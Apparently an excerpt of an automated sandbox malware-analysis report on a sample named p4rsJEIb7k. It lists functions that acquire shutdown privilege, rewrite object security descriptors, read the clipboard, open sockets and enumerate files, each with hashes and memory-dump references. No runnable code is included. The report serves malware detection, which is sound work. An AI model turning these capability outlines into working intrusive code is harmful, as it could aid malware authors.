                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                • API String ID: 2938487562-3733053543
                                                                                                                • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                Function 00445DD3 Relevance: 16.7, APIs: 11, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1255039815-0
                                                                                                                • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                Function 004037E0 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 359COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                Strings
                                                                                                                • Error opening the file, xrefs: 0042B8AC
                                                                                                                • _, xrefs: 00403B48
                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                • Unterminated string, xrefs: 0042B9BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCurrentDirectoryMultiWide$FullNamePath
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                • API String ID: 522955547-188983378
                                                                                                                • Opcode ID: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                                • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                • Opcode Fuzzy Hash: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                                • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                Function 0047A999 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstance$BlanketFromProgProxySecurity
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 628432406-2785691316
                                                                                                                • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                Function 0043614F Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock$Sizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 4215241788-0
                                                                                                                • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                Function 0047AD92 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 3904779488-2761332787
                                                                                                                • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2609815416-0
                                                                                                                • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                Function 00427859 Relevance: 9.5, Strings: 7, Instructions: 793COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$T$_iB
                                                                                                                • API String ID: 0-4145368158
                                                                                                                • Opcode ID: 40fd759e06795c51c6d44f44d3c5b8b210a1b9c9a66bbae5e363e359e7067c76
                                                                                                                • Instruction ID: 4c0c7ed0c9658f191bc49dc210f9e18f2f65a652a6defb2a8c1265378aa6e59e
                                                                                                                • Opcode Fuzzy Hash: 40fd759e06795c51c6d44f44d3c5b8b210a1b9c9a66bbae5e363e359e7067c76
                                                                                                                • Instruction Fuzzy Hash: A562C131E0466A8BDF24CFA8D8402EEB7B1FF55310F95816BD811AB381D7784A46CB99
                                                                                                                Function 00426DA1 Relevance: 9.2, APIs: 6, Instructions: 156memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00423462: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,0041BD80,00000000,00000000,00000000,00000002,00000000,00000000), ref: 004234A4
                                                                                                                  • Part of subcall function 00423462: GetLastError.KERNEL32(?,0041BD80,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,0041C46E,00000000,00000002,00000000,0048CB40,00000010), ref: 004234B1
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109,00000109), ref: 00426E0A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109,00000109), ref: 00426E11
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E), ref: 00426E8D
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109), ref: 00426E94
                                                                                                                • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E), ref: 00426EEF
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109), ref: 00426F1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1354853467-0
                                                                                                                • Opcode ID: c77f5c4fbdd969b6395b23d28f869cdae7d1fae00b5a1ae8a4ef132f81dfdc60
                                                                                                                • Instruction ID: 42e05f79c57693437edf2df5a3fd70b8e7b48e5887b3da35eff89abe1339f9d1
                                                                                                                • Opcode Fuzzy Hash: c77f5c4fbdd969b6395b23d28f869cdae7d1fae00b5a1ae8a4ef132f81dfdc60
                                                                                                                • Instruction Fuzzy Hash: 8A410676A00125AEDF102FB8EC466AE7B75EF00324F57462AF934972A0D77C4D518B98
                                                                                                                Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNextSleep
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1749430636-438819550
                                                                                                                • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
